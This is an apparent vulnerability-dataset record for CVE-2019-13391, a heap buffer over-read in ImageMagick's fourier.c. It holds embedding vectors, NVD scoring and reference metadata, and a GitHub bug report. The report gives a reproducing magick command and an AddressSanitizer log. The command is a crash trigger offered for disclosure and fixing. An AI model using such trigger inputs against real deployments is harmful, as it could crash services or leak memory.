0.010956726036965847, 0.015067134983837605, 0.021167295053601265, -0.0076775630004704, 0.012926843017339706, -0.006879043765366077, -0.008822979405522346, 0.008580805733799934, -0.006466694176197052, 0.00467657158151269, -0.024479186162352562, -0.0020961121190339327, -0.016062011942267418, 0.0035147920716553926, 0.015525301918387413, -0.0009236965561285615, -0.0126715786755085, -0.010406926274299622, -0.003694786224514246, 0.010969816707074642, 0.004395126365125179, -0.0029960821848362684, 0.0014865868724882603, 0.00029412657022476196, 0.011323260143399239, -0.0066499607637524605, 0.006031435914337635, 0.025853686034679413, 0.01257339958101511, 0.0028864494524896145, 0.007775741163641214, 0.005370366852730513, 0.016729624941945076, -0.009124060161411762, 0.022567976266145706, 0.0051969182677567005, -0.0005060286493971944, -0.010773459449410439, -0.003986049443483353, 0.0058481693267822266, 0.007356846239417791, 0.015459849499166012, 0.0072063058614730835, -0.030396079644560814, 0.016755806282162666, 0.016546359285712242, -0.0035638813860714436, 0.0044082170352339745, -0.019871339201927185, 0.03853835538029671, 0.001452224445529282, -0.015787111595273018, 0.00795900821685791, 0.0038518719375133514, -0.023746119812130928, -0.021991996094584465, 0.010609828867018223, -0.013064293190836906, 0.01027602143585682, -0.00573690002784133, -0.012043235823512077, 0.0025951864663511515, 0.035736992955207825, 0.011454164050519466, -0.018915735185146332, -0.014438792131841183, 0.00544563727453351, 0.01113999355584383, -0.033668696880340576, -0.0050431047566235065, 0.012383587658405304, -0.014700601808726788, -0.00029903551330789924, -0.011820698156952858, 0.02101021073758602, -0.0025297340471297503, 0.0004084636748302728, 0.0016788532957434654, 0.015132587403059006, 0.01433406863361597, 0.021141115576028824, -0.0030615346040576696, 0.01323446910828352, 0.01845756731927395, -0.008829524740576744, 0.004260949324816465, -0.01751505397260189, 0.020918576046824455, 0.006846317555755377, 0.016402363777160645, 0.02070912905037403, 0.010262931697070599, 0.014190073125064373, -0.004152952693402767, -0.013038111850619316, -0.009366233833134174, 0.005327822640538216, -0.011591614224016666, 0.007723379414528608, 0.007304484490305185, 0.016048921272158623, -0.009470957331359386, -0.012239593081176281, 0.011434528976678848, 0.006473239045590162, 0.0032726183999329805, 0.02148146741092205, -0.00012313226761762053, -0.016821257770061493, -0.003459157655015588, -0.004512940999120474, 0.01953098736703396, 0.00901933666318655, -0.016480905935168266, -0.019151363521814346, -0.007311029359698296, 0.009202603250741959, 0.031102964654564857, 0.002695001196116209, -0.02407338097691536, -0.011827242560684681, -0.006774320267140865, -0.006339062005281448, -0.03851217404007912, 0.026652203872799873, -0.01027602143585682, 0.0007895191665738821, -0.00481402175500989, -0.006620507221668959, 0.0056419940665364265, 0.015904925763607025, 0.0006586144445464015, 0.0037798741832375526, 0.016703443601727486, 0.007513931952416897, -0.0021599282044917345, 0.00901933666318655, 0.0049907430075109005, -0.0033380708191543818, 0.007618655916303396, 0.010570557788014412, 0.006440512835979462, -0.0014088621828705072, -0.0032169839832931757, -0.02594531886279583, -0.011166173964738846, -0.008482626639306545, 0.0006545236683450639, 0.003789692185819149, -0.001660035690292716, -0.0044867596589028835, 0.00700994860380888, -0.008659347891807556, -0.0027964524924755096, -0.0025313703808933496, -0.010524740442633629, 0.009497138671576977, -0.023065414279699326, -0.0006794774089939892, -0.014713692478835583, 0.005920166615396738, 0.012494857423007488, -0.014726783148944378, 0.014098440296947956, -0.005435819271951914, -0.005246007349342108, -0.001080782269127667, 0.0031318957917392254, 0.00935314316302538, 0.015878744423389435, 0.004997288342565298, -0.007841194048523903, 0.01686052978038788, 0.006754684261977673, 0.023746119812130928, 0.018326662480831146, -0.00941859558224678, 0.0010578739456832409, 0.003159713000059128, 0.002838996471837163, 0.015263492241501808, 0.00048230212996713817, -0.01704379729926586, -0.015486029908061028, 0.00039700951310805976, 0.0029617196414619684, 0.02175636775791645, 0.011297078803181648, -0.0009073334513232112, 0.01334573794156313, -0.010845457203686237, -0.0031286231242120266, 0.010760369710624218, 0.006460148841142654, -0.007494296412914991, -0.006721958052366972, 0.01925608702003956, 0.020250963047146797, -0.012187231332063675, 0.009961850009858608, 0.023968657478690147, 0.0019602985121309757, -0.01713543012738228, -0.008764072321355343, 0.009202603250741959, -0.01900736801326275, 0.012337771244347095, -0.016284549608826637, -0.02137674391269684, -0.02864195592701435, -0.014137711375951767, 0.011801062151789665, -0.011545797809958458, 0.0013597729848697782, 0.0023873751051723957, 0.01936081051826477, 0.007212851196527481, 0.008443355560302734, -0.005177282262593508, 0.025330066680908203, 0.007723379414528608, 0.0010554194450378418, 0.0101909339427948, -0.0029551745392382145, 0.00913060549646616, 0.0313909575343132, -0.005069286096841097, -0.0022646519355475903, -0.013744997791945934, -0.002029023366048932, 0.008469536900520325, 0.0026590025518089533, -0.00038126003346405923, 0.0029862644150853157, -0.03903579339385033, -0.005272188223898411, 0.00926805566996336, 0.010668735951185226, 0.02679619938135147, 0.004643845371901989, 0.012017054483294487, -0.013116654939949512, -0.005651812069118023, -0.004005684982985258, 0.007546658162027597, -0.024217376485466957, -0.009673859924077988, 0.02153383009135723, 0.009065153077244759, 0.02525152452290058, 0.004244585987180471, 0.04620937258005142, 0.008737890981137753, 0.002222107956185937, -0.0002712182467803359, 0.014438792131841183, 0.0003630561113823205, -0.002199199516326189, 0.0033217077143490314, -0.02277742512524128, 0.01850992999970913, -0.013090473599731922, -0.014818415977060795, 0.002982991747558117, -0.03563226759433746, 0.0005424364935606718, -0.015760930255055428, -0.010262931697070599, 0.007978643290698528, -0.01174870040267706, -0.015420578420162201, -0.013888992369174957, -0.006270336918532848, 0.021311290562152863, -0.01009275484830141, 0.004084227606654167, 0.0010955090401694179, 0.02677001804113388, 0.00910442415624857, -0.00856771506369114, -0.032019298523664474, 0.01122508104890585, 0.012658488005399704, 0.011185809969902039, 0.003796237288042903, 0.017999401316046715, -0.007834648713469505, -0.004058046732097864, 0.013064293190836906, -0.0018899370916187763, -0.027699442580342293, 0.004182406235486269, 0.0006741593824699521, -0.017672140151262283, -0.006073979660868645, 0.013614092953503132, 0.014229345135390759, -0.028170699253678322, -0.011997419409453869, 0.01699143461883068, -0.020120058208703995, 0.0012100506573915482, -0.004090772941708565, -0.014281706884503365, 0.0020339323673397303, 0.014347159303724766, -0.01257339958101511, -0.007906646467745304, -0.006460148841142654, -0.027437632903456688, -0.0017557598184794188, 0.011441074311733246, -0.014006806537508965, 0.0017050341702997684, -0.018051763996481895, -0.0275423564016819, -0.0028291787020862103, -0.016376182436943054, 0.0022499251645058393, -0.010118936188519001, 0.021887272596359253, -0.0016567630227655172, -0.009143696166574955, -0.018824100494384766, -0.021520739421248436, -0.020787673071026802, 0.01312320027500391, 0.02853723242878914, 0.001435043173842132, 0.009006245993077755, -0.0028635410126298666, -0.002259742934256792, -0.019099000841379166, 0.0064176046289503574, -0.012396678328514099, 0.009700041264295578, -0.0015078589785844088, -0.004444215912371874, -0.020866215229034424, -0.01608819141983986, 0.004591483622789383, -0.009065153077244759, 0.016847439110279083, -0.0180386733263731, -0.0008926066802814603, 0.0050856489688158035, -0.017724500969052315, -0.007513931952416897, 0.012409768998622894, 0.00022519705817103386, 0.013293376192450523, 0.003123714355751872, -0.0000029977695703564677, -0.014242435805499554, -0.006522328592836857, 0.007500841282308102, 0.0025951864663511515, -0.007991733960807323, -0.014320977963507175, -0.009595316834747791, 0.0015716749476268888, 0.008057186380028725, 0.002032296033576131, 0.009189512580633163, -0.004470396786928177, 0.0005747536197304726, 0.005802352447062731, -0.008626622147858143, 0.00005348685590433888, 0.02112802490592003, 0.007324120029807091, 0.008188091218471527, -0.008849159814417362, 0.02666529454290867, 0.019740434363484383, 0.016402363777160645, -0.01850992999970913, 0.015970377251505852, 0.005884167738258839, -0.004931835923343897, 0.008528443984687328, -0.015590754337608814, 0.004539121873676777, -0.0128090288490057, 0.00824699830263853, -0.010956726036965847, 0.017449600622057915, 0.006813591346144676, -0.004558757413178682, 0.01327374018728733, -0.0075990199111402035, -0.004823839757591486, 0.03914051502943039, -0.01217414066195488, 0.01142798364162445, -0.022620338946580887, 0.006918315310031176, -0.009902942925691605, 0.003069716040045023, -0.005988891702145338, -0.013457006774842739, 0.013862811960279942, -0.006787410471588373, 0.02440064214169979, 0.00028144518728367984, -0.008901522494852543, 0.015184949152171612, -0.0011085994774475694, 0.020264053717255592, -0.029348842799663544, -0.010236750356853008, -0.01161125022917986, -0.00013693863002117723, 0.0002534233790356666, 0.004205314442515373, 0.01663799211382866, 0.010289112105965614, 0.002501916838809848, -0.004241313319653273, 0.012527583166956902, -0.003279163734987378, 0.0010799641022458673, -0.006083797663450241, -0.017593596130609512, -0.0019930247217416763, 0.023667575791478157, 0.015564572997391224, -0.010446198284626007, 0.009372779168188572, 0.0038813254795968533, 0.016179826110601425, 0.01798631064593792, -0.007023039273917675, -0.03963795304298401, 0.01133634988218546, 0.01586565375328064, -0.00004203269418212585, -0.006944496184587479, -0.01140180230140686, -0.012449040077626705, -0.012435950338840485, 0.012645397335290909, -0.013692635111510754, 0.021049480885267258, -0.005619085859507322, -0.021573100239038467, 0.016232186928391457, 0.006600871216505766, -0.011768335476517677, 0.00976549368351698, -0.022188352420926094, -0.012802483513951302, -0.02073531039059162, -0.010498560033738613, 0.0018653925508260727 ]
3,138
CVE-2019-13391
2019-07-07T22:15:10.503000
In ImageMagick 7.0.8-50 Q16, ComplexImages in MagickCore/fourier.c has a heap-based buffer over-read because of incorrect calls to GetCacheViewVirtualPixels.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7c2c5ba5b8e3a0b2b82f56c71dfab74ed4006df7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1588" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/f6ffc702c6eecd963587273a429dcd608c648984" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1588
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow in MagickCore/fourier.c:314:19 in .omp_outlined._debug__ Heap buffer overflow sometimes occur. To trigger this bug, please run the command for several times. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick "-seed" "0" "-black-point-compensation" "-fuzz" "238" "(" "magick:logo" "-normalize" "-cycle" "615" ")" "(" "magick:rose" "-gaussian-blur" "4" ")" "(" "magick:granite" "-convolve" "207,117,126,202,52,59,196,21,46,216,32,49,172,14,116,115,203,20,219,21,194,58,155,117,148,208,229,218,151,151,171,239,212,207,77,212,81,32,23,137,63,164,67,85,47,13,85,96,85,86,244,168,218,41,98,108,208,221,77,5,45,117,102,5,89,150,47,36,214,0,20,255,14,83,77,191,109,40,32,245,112" ")" "-strokewidth" "58" "-complex" "subtract" "-layers" "compare-overlay" "" ` ASAN log about heap buffer over-flow. ``` ==18953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000020200 at pc 0x0000014f4b4e bp 0x7fa64464bc30 sp 0x7fa64464bc28 READ of size 4 at 0x619000020200 thread T2 #0 0x14f4b4d in .omp_outlined._debug__ MagickCore/fourier.c:314:19 #1 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #2 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7fa64f93bb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #5 0x7fa64f97b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #6 0x7fa651fb76da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #7 0x7fa64f41f88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) 0x619000020200 is located 0 bytes to the right of 896-byte region [0x61900001fe80,0x619000020200) allocated by thread T2 here: #0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x14f2984 in .omp_outlined._debug__ MagickCore/fourier.c:249:8 #7 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #8 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) Thread T2 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7fa64f979110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:314:19 in .omp_outlined._debug__ ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/fourier.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1588/comments
7
2019-06-11T03:25:05
2019-07-08T01:55:44Z
https://github.com/ImageMagick/ImageMagick/issues/1588
454,462,914
1,588
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : heap-buffer-overflow in MagickCore/fourier.c Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow in MagickCore/fourier.c:314:19 in .omp_outlined._debug__ Heap buffer overflow sometimes occur. To trigger this bug, please run the command for several times. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick "-seed" "0" "-black-point-compensation" "-fuzz" "238" "(" "magick:logo" "-normalize" "-cycle" "615" ")" "(" "magick:rose" "-gaussian-blur" "4" ")" "(" "magick:granite" "-convolve" "207,117,126,202,52,59,196,21,46,216,32,49,172,14,116,115,203,20,219,21,194,58,155,117,148,208,229,218,151,151,171,239,212,207,77,212,81,32,23,137,63,164,67,85,47,13,85,96,85,86,244,168,218,41,98,108,208,221,77,5,45,117,102,5,89,150,47,36,214,0,20,255,14,83,77,191,109,40,32,245,112" ")" "-strokewidth" "58" "-complex" "subtract" "-layers" "compare-overlay" "" ` ASAN log about heap buffer over-flow. ``` ==18953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000020200 at pc 0x0000014f4b4e bp 0x7fa64464bc30 sp 0x7fa64464bc28 READ of size 4 at 0x619000020200 thread T2 #0 0x14f4b4d in .omp_outlined._debug__ MagickCore/fourier.c:314:19 #1 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #2 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7fa64f93bb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #5 0x7fa64f97b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #6 0x7fa651fb76da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #7 0x7fa64f41f88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) 0x619000020200 is located 0 bytes to the right of 896-byte region [0x61900001fe80,0x619000020200) allocated by thread T2 here: #0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x14f2984 in .omp_outlined._debug__ MagickCore/fourier.c:249:8 #7 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #8 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) Thread T2 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7fa64f979110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:314:19 in .omp_outlined._debug__ ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 <!-- Thanks for reporting the issue to ImageMagick! --> --- end body ---
3,990
[ -0.02233760990202427, 0.012768271379172802, -0.011615008115768433, -0.0014716119039803743, 0.054670169949531555, 0.012788865715265274, -0.042505986988544464, 0.04786042496562004, -0.03866177797317505, 0.03937570005655289, -0.026648618280887604, -0.015253279358148575, 0.035860996693372726, 0.02328493446111679, 0.002081708749756217, -0.0032950378954410553, -0.02391648292541504, 0.006761691998690367, -0.03097335621714592, -0.014759023673832417, -0.004393383860588074, -0.0027801881078630686, -0.024410737678408623, 0.04357687383890152, -0.03402126580476761, 0.014154933393001556, -0.007681556977331638, 0.0043453313410282135, 0.009109406732022762, 0.02771950513124466, 0.02335358038544655, 0.02652505412697792, -0.008416076190769672, 0.023985128849744797, 0.03190695121884346, -0.009425180964171886, 0.03319750726222992, 0.08836193382740021, 0.009116271510720253, 0.040199462324380875, 0.002800782211124897, -0.04720141738653183, 0.010393097996711731, 0.005155361257493496, -0.01696944423019886, -0.02984755113720894, 0.01872679777443409, -0.021541310474276543, -0.021362828090786934, 0.02523449808359146, 0.044098589569330215, -0.0015153741696849465, -0.034268394112586975, -0.0461854450404644, 0.002316823462024331, -0.017477430403232574, 0.040117084980010986, 0.033142589032649994, 0.024795159697532654, 0.002867712639272213, -0.0047022937797009945, 0.03330733999609947, -0.001557420240715146, 0.012576061300933361, 0.008965249173343182, -0.01735386624932289, 0.021582497283816338, 0.01661248318850994, -0.01659875363111496, 0.028694286942481995, -0.015294467099010944, -0.014951233752071857, 0.031769655644893646, 0.03003976121544838, 0.01688706874847412, 0.025083474814891815, 0.02725270949304104, -0.00023854701430536807, -0.06705401837825775, 0.03171473741531372, -0.04923335835337639, 0.026854557916522026, -0.046981748193502426, 0.03737122192978859, 0.04582848399877548, 0.017587264999747276, -0.031659822911024094, -0.062276214361190796, -0.040556423366069794, -0.014209850691258907, -0.008718120865523815, 0.013132099062204361, -0.009281023405492306, 0.01966039277613163, 0.025426708161830902, 0.009617391973733902, -0.025934694334864616, -0.005296086892485619, -0.045196935534477234, 0.0033654007129371166, -0.014010775834321976, -0.0035970830358564854, -0.004177147056907415, 0.017669640481472015, 0.008800497278571129, 0.009157459251582623, -0.01661248318850994, -0.03717901185154915, 0.038908906280994415, 0.12213607132434845, -0.008834820240736008, -0.03078114427626133, -0.013379226438701153, 0.015898557379841805, 0.004716022871434689, 0.0392933264374733, 0.012933023273944855, 0.007866903208196163, -0.03069876879453659, -0.013406685553491116, -0.028886498883366585, -0.02224150486290455, -0.013324309140443802, 0.004091338720172644, -0.03207170218229294, 0.026209279894828796, 0.0018671881407499313, -0.02641521953046322, -0.007159842643886805, -0.00744129391387105, -0.014662918634712696, -0.0035902182571589947, 0.010653955861926079, -0.031742196530103683, -0.0167909637093544, -0.023902753368020058, -0.023985128849744797, 0.043439581990242004, 0.03978758305311203, -0.009219241328537464, -0.07869648933410645, -0.020058542490005493, 0.018191354349255562, 0.03503723442554474, -0.0017144493758678436, 0.011752301827073097, -0.038908906280994415, 0.013097775168716908, -0.007935549132525921, -0.02883158065378666, -0.03459789603948593, 0.001887782127596438, 0.008045383729040623, -0.02226896397769451, 0.04939810931682587, -0.019344618543982506, 0.03237374499440193, 0.02567383646965027, -0.024520572274923325, -0.043631792068481445, -0.0002486294833943248, -0.031193025410175323, 0.0013626354048028588, -0.0038133198395371437, -0.0005363017553463578, -0.027390001341700554, 0.006823474075645208, 0.033527009189128876, 0.018411023542284966, 0.03237374499440193, 0.009905707091093063, 0.00623311335220933, 0.017957955598831177, 0.008182677440345287, -0.051787011325359344, 0.014566812664270401, 0.006548887584358454, 0.015898557379841805, -0.015321926213800907, -0.01669485867023468, 0.0015814465004950762, -0.02419106848537922, -0.00568394036963582, 0.015829911455512047, 0.052446018904447556, -0.007406970486044884, 0.0035661919973790646, -0.025481626391410828, 0.01871306821703911, 0.005100443959236145, 0.0012124709319323301, -0.020003626123070717, 0.015335654839873314, -0.029902467504143715, 0.04105067998170853, -0.012274015694856644, -0.04591086134314537, -0.022873053327202797, 0.018809175118803978, -0.01577499322593212, -0.010139105841517448, -0.012260286137461662, -0.03459789603948593, -0.021404016762971878, 0.004592459183186293, 0.022694572806358337, -0.004530677106231451, 0.025440437719225883, 0.012040616944432259, -0.00788063183426857, -0.023202557116746902, -0.008635745383799076, 0.008065978065133095, 0.022859325632452965, -0.027046767994761467, 0.00788749661296606, -0.0012356392107903957, 0.00105372560210526, -0.024781430140137672, -0.009933166205883026, 0.009191782213747501, -0.02522076852619648, -0.008059113286435604, -0.032126620411872864, -0.0275410246104002, 0.003080517053604126, -0.0008495019283145666, -0.004664537962526083, -0.053077567368745804, -0.007654098328202963, 0.00774333905428648, -0.009981218725442886, -0.012782000936567783, 0.011415933258831501, 0.018040332943201065, -0.004208038095384836, -0.00477780494838953, 0.02030567079782486, -0.0064356205984950066, 0.017134197056293488, 0.011086429469287395, 0.019715309143066406, -0.009699767455458641, -0.007750203367322683, 0.02725270949304104, 0.04041913151741028, -0.010022406466305256, -0.00693330867215991, -0.010695143602788448, 0.007660963106900454, -0.022406257688999176, -0.015006151050329208, -0.005354436580091715, 0.0019615772180259228, -0.00032456981716677547, -0.007997331209480762, 0.01558278314769268, -0.0041359588503837585, -0.009473233483731747, -0.03440568596124649, 0.036492545157670975, 0.009109406732022762, -0.003538733348250389, 0.018411023542284966, 0.024451926350593567, -0.0181638952344656, -0.0012545170029625297, 0.012836918234825134, -0.0006040902808308601, -0.011299233883619308, 0.03827735409140587, -0.020237023010849953, -0.014608001336455345, -0.05387386679649353, -0.009617391973733902, 0.006339515559375286, 0.029353294521570206, 0.024163611233234406, 0.014594271779060364, -0.006188492756336927, -0.0009473233949393034, 0.037618350237607956, -0.016337895765900612, 0.012136722914874554, 0.01725776121020317, 0.0027304193936288357, 0.03470773249864578, -0.041215430945158005, -0.015335654839873314, -0.01956428773701191, -0.025152122601866722, 0.0027424325235188007, -0.05379149317741394, 0.004671402741223574, 0.02112942934036255, 0.014305955730378628, 0.0015059352153912187, -0.026017069816589355, -0.02365562506020069, 0.011237451806664467, -0.03391142934560776, -0.015871098265051842, -0.007249083369970322, 0.011484580114483833, -0.03196186572313309, 0.01493750512599945, -0.019976167008280754, 0.0137705123052001, -0.009713497012853622, -0.026744723320007324, 0.0252070389688015, -0.048464514315128326, 0.006363541819155216, -0.00273556774482131, -0.034927401691675186, 0.011635602451860905, 0.01437460258603096, -0.002982695586979389, 0.001219335594214499, -0.013193880207836628, -0.043988753110170364, -0.023339850828051567, -0.020923489704728127, 0.020703820511698723, -0.005275493022054434, 0.004290414042770863, -0.0125280087813735, 0.03792039304971695, -0.08632998913526535, 0.027335084974765778, -0.0015514136757701635, -0.03800277039408684, -0.012411309406161308, -0.026593701913952827, 0.029600422829389572, -0.03393888846039772, -0.04135272279381752, 0.04253344610333443, 0.019893791526556015, 0.02874920517206192, -0.0179030392318964, 0.03127539902925491, 0.011841542087495327, -0.04451046884059906, 0.0189052801579237, -0.0020010489970445633, 0.009624255821108818, -0.001200457802042365, 0.021829625591635704, -0.0203880462795496, 0.0008293369901366532, 0.035009775310754776, -0.005035229492932558, 0.03281308338046074, 0.025715025141835213, 0.0064115943387150764, -0.01585736870765686, 0.0017427661223337054, 0.02596215158700943, -0.019811414182186127, -0.02188454195857048, -0.03822243958711624, -0.007599181029945612, -0.009383993223309517, 0.01501988060772419, 0.0013720743590965867, -0.024548031389713287, -0.036108121275901794, -0.03940315917134285, -0.00393688352778554, -0.02968279831111431, 0.06194671243429184, -0.029820092022418976, 0.0072147599421441555, -0.040199462324380875, -0.02568756602704525, -0.011038376949727535, 0.005316680762916803, -0.025522813200950623, 0.009988083504140377, -0.014154933393001556, 0.024987369775772095, 0.059859853237867355, -0.04107813909649849, 0.0230927225202322, 0.031138107180595398, -0.013441008515655994, 0.01734013669192791, -0.0025141825899481773, -0.01788930967450142, -0.04673461988568306, 0.044290799647569656, -0.027870528399944305, -0.04755837842822075, -0.009583068080246449, 0.03388397395610809, -0.0057869101874530315, -0.00653515849262476, 0.048354681581258774, -0.06370406597852707, 0.004568432457745075, -0.03690442442893982, 0.028529535979032516, 0.010523526929318905, 0.0006397006800398231, 0.04124289005994797, 0.020086001604795456, -0.009232970885932446, 0.027884257957339287, -0.003068503923714161, 0.040556423366069794, 0.0068680946715176105, -0.026291655376553535, -0.005302951671183109, 0.033609386533498764, 0.00688525615260005, 0.010818707756698132, -0.015884827822446823, -0.030671309679746628, 0.008567098528146744, -0.020154647529125214, 0.01015970017760992, 0.010585309006273746, 0.029792632907629013, 0.00960366241633892, 0.023889023810625076, 0.03190695121884346, 0.006037470418959856, -0.0069916583597660065, -0.018699340522289276, -0.0380302295088768, -0.009287888184189796, 0.008038518950343132, 0.010667684487998486, -0.011038376949727535, -0.02874920517206192, -0.032318830490112305, -0.02346341498196125, -0.03662983700633049, 0.004681699443608522, 0.009232970885932446, 0.04236869513988495, -0.021541310474276543, -0.038908906280994415, -0.03023197129368782, -0.024040047079324722, -0.027966633439064026, 0.0007555418997071683, -0.010036136023700237, -0.024548031389713287, -0.002745864912867546, 0.03451552242040634, -0.002057682489976287, -0.021857084706425667, 0.030726227909326553, -0.013482196256518364, -0.006318921688944101, -0.02465786598622799, 0.02560519054532051, -0.018754256889224052, 0.0024472519289702177, 0.013743053190410137, -0.0014115461381152272, -0.030067220330238342, 0.023106452077627182, 0.015994662418961525, 0.01191705372184515, -0.022145399823784828, 0.00240091560408473, -0.013235068880021572, 0.01205434650182724, 0.037316303700208664, -0.007578587159514427, 0.003634838620200753, -0.007860038429498672, 0.019413264468312263, -0.018328648060560226, -0.019701579585671425, 0.007674692198634148, -0.058102499693632126, 0.017010632902383804, -0.03959536924958229, -0.0050489590503275394, 0.006833771243691444, 0.04610307142138481, 0.004328169394284487, 